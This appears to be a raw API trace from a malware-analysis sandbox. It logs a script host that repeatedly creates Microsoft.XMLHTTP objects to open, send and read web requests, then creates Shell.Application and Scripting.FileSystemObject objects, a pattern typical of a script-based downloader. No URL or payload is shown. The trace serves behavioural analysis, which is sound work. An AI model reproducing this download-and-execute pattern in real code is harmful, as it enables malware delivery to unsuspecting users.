	[0561.074] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.074] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0561.074] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0561.074] ??2@YAPEAX_K@Z () returned 0x62f310
	[0561.074] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.074] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0561.074] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.074] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.075] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.075] SysStringLen (param_1=0x0) returned 0x0
	[0561.075] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.075] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0561.075] ??2@YAPEAX_K@Z () returned 0x62f330
	[0561.075] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.075] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.075] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.076] longjmp () 
	[0561.076] longjmp () 
	[0561.076] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.076] SysStringLen (param_1=0x0) returned 0x0
	[0561.076] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.076] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0561.076] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0561.076] ??2@YAPEAX_K@Z () returned 0x62f310
	[0561.076] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f310) 
	[0561.076] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.076] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0561.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0561.076] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0561.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.076] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.077] longjmp () 
	[0561.077] longjmp () 
	[0561.077] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.077] SysStringLen (param_1=0x0) returned 0x0
	[0561.077] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.077] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0561.077] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0561.077] ??2@YAPEAX_K@Z () returned 0x62f330
	[0561.077] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.077] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0561.077] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0561.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.078] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.078] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0561.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0562.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0562.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0562.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0562.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0562.783] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0562.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0562.783] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0562.783] SysStringLen (param_1=0x0) returned 0x0
	[0562.783] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0562.783] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0562.783] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0562.783] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0562.783] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0562.783] ??2@YAPEAX_K@Z () returned 0x62f350
	[0562.783] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0562.783] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0562.783] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0562.783] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0562.783] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0562.784] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0562.784] SysStringLen (param_1=0x0) returned 0x0
	[0562.784] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0562.787] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0562.787] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0562.787] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0562.787] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0562.787] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0562.787] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0564.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0564.288] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0564.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0564.290] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.290] SysStringLen (param_1=0x0) returned 0x0
